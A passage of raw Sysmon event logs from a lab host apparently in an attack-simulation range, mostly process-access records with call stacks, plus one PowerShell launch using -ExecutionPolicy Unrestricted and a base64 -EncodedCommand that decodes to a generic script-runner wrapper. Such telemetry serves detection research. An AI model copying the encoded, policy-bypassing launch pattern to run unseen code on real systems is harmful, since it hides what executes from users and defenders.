ystem32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000142Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.231{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000141Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.231{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000140Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.231{08A6967A-40DF-6000-0C00-000000009901}4801044C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000139Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.231{08A6967A-40D2-6000-0500-000000009901}6443180C:\Windows\system32\csrss.exe{08A6967A-425C-6000-CF02-000000009901}2592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000138Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.231{08A6967A-425A-6000-CD02-000000009901}47563696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{08A6967A-425C-6000-CF02-000000009901}2592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF9C78FB68F) 154100x8000000000000000137Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.206{08A6967A-425C-6000-CF02-000000009901}2592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\zdaf1vyu.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{08A6967A-4258-6000-5FAB-100000000000}0x10ab5f0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{08A6967A-425A-6000-CD02-000000009901}4756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000136Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:44.200{08A6967A-425A-6000-CD02-000000009901}4756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\zdaf1vyu.cmdline2021-01-14 13:08:44.200 11241100x8000000000000000135Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:08:44.200{08A6967A-425A-6000-CD02-000000009901}4756C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\zdaf1vyu.dll2021-01-14 13:08:44.200 10341000x8000000000000000134Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.997{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000133Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.997{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000132Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:43.997{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000257Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.793{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000256Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.793{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000255Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.793{08A6967A-40DD-6000-0B00-000000009901}8683796C:\Windows\system32\lsass.exe{08A6967A-40E0-6000-1400-000000009901}1300C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000254Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.731{08A6967A-425D-6000-D202-000000009901}45722460C:\Windows\system32\conhost.exe{08A6967A-425D-6000-D602-000000009901}4048C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000253Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.731{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000252Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.731{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000251Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.731{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000250Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.731{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000249Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.731{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000248Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.731{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000247Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.731{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000246Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.731{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000245Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.731{08A6967A-40D2-6000-0500-000000009901}644660C:\Windows\system32\csrss.exe{08A6967A-425D-6000-D602-000000009901}4048C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000244Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:08:45.731{08A6967A-40DF-6000-0C00-000000009901}480596C:\Windows\system32\svchost.exe{08A6967A-4256-6000-C702-000000009901}4320C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000243Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 